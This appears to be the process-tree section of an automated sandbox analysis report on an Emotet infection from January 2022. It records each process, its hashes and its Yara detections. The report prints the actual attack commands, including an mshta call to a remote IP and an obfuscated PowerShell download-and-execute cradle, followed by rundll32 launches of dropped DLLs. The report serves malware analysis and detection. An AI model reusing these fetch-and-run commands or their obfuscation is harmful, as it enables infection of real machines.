                                    Start time:21:14:16
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                                    Imagebase:0x4a030000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:4
                                    Start time:21:14:17
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                                    Imagebase:0x4a030000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:5
                                    Start time:21:14:17
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd
                                    Imagebase:0x4a030000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:6
                                    Start time:21:14:18
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:mshta http://91.240.118.172/ee/ss/se.html
                                    Imagebase:0x13fd10000
                                    File size:13824 bytes
                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:8
                                    Start time:21:14:20
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                    Imagebase:0x13f180000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    Target ID:10
                                    Start time:21:14:29
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                    Imagebase:0x4a3f0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:11
                                    Start time:21:14:30
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:12
                                    Start time:21:14:35
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:13
                                    Start time:21:15:00
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:14
                                    Start time:21:15:07
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:16
                                    Start time:21:15:25
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                    Target ID:17
                                    Start time:21:15:30
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                    No disassembly
